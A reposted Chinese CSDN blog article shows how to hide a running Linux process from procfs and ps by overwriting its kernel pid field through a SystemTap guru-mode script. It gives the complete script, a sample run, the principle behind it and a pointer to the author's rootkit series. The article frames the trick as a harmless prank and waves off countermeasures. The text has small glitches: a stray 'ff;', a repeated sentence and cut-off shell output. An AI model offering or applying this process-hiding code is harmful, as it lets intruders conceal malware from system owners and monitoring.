一行代码如何隐藏 Linux 进程?

百家 作者:CSDN 2020-08-19 15:29:22
作者 | dog250
责编 | 王晓曼
头图 | CSDN 下载自东方IC
出品 | CSDN 博客
总有朋友问隐藏Linux进程的方法,我说你想隐藏到什么程度,是大隐于内核,还是小隐于用户。
网上通篇论述的无外乎 hook 掉 procfs 或者类似的用户态方案,也都难免长篇大论,我说,这些场面都太大了,太复杂了。对于希望马上看到效果的而言,看到这么一堆复杂的东西,大概率望而却步。
本文介绍一种将Linux进程小隐于用户的非常规方法,仅仅一行代码:
修改掉进程的pid即可。
注意是小隐,所以,不值得反制,逗一下高级会议工程师搞个恶作剧玩玩得了。
target->pid = 0x7fffffff;
完整的脚本如下:
#!/usr/bin/stap -g
# hide.stp

global pid;

function hide(who:long)
%
{
    struct task_struct *target;

    target = pid_task(find_vpid(STAP_ARG_who), PIDTYPE_PID);
    target->pid = 0x7fffffff;
%}

probe begin
{
    pid = $1
    hide(pid);
    exit();
}
ff;
来来来,试一下:
[root@localhost system]# ./tohide &
[1403
[root@localhost system]# ./hide.stp
[root@localhost system]
用下面的命令可以检测所有可显示进程的二进制文件:
for pid in $(ls /proc|awk '/^[0-9]+/{print $1}'); do 
    ls -l /proc/$pid/exe; 
done
procfs里没了,ps当然就检测不到了。
如果你觉得 guru 模式的 stap 怪怪的,那么你完全可以编写自己独立的 Linux kernel module,采用修改完即退的方法:
target->pid = xxxx;
return -1;是不是比各种hook法简单多了,所谓的动数据而不要动代码!

是不是比各种 hook 法简单多了,所谓的动数据而不要动代码!

简单的说一下原理:
  • task被创建的时候,根据其pid注册procfs目录结构。
  • 展示procfs目录结构的时候,遍历task list以其pid作为key来查找procfs目录结构。
  • 0x7fffffff(或者任何其它合理的值)根本没有注册过,当然无法显示。
不多说。
再次声明,不要试图对本文所描述的方法进行反制,因为这么简单的东西根本不值得反制,哈哈,不是吗?
可以参考我之前的 Rootkit 系列文章来继续研究 Linux 进程大隐于内核的方法。同时,每一种方法我都给出了反制措施。
自己和自己下棋的本来就不多,我想试试。
声明:本文为 CSDN 博主「dog250」的原创文章,版权归作者所有。
原文:https://blog.csdn.net/dog250/article/details/108032383


更多精彩推荐

Java 二十五载,正在 Kotlin 化!

国产芯回忆录:造光刻的去卖早点,搞 EDA 的去组装电脑

连按 5 次 Shift 重改 CMD 和密码并重启电脑,这个漏洞你不能不知道!

维度爆炸?Python实现数据压缩如此简单

征战云时代,为什么安全是关键命题?

出海、拆分、集成公链,“国家队区块链选手”BSN在下一盘怎样的棋?

点分享
点点赞
点在看

关注公众号:拾黑(shiheibook)了解更多

[广告]赞助链接:

四季很好,只要有你,文娱排行榜:https://www.yaopaiming.com/
让资讯触达的更精准有趣:https://www.0xu.cn/

公众号 关注网络尖刀微信公众号
随时掌握互联网精彩
赞助链接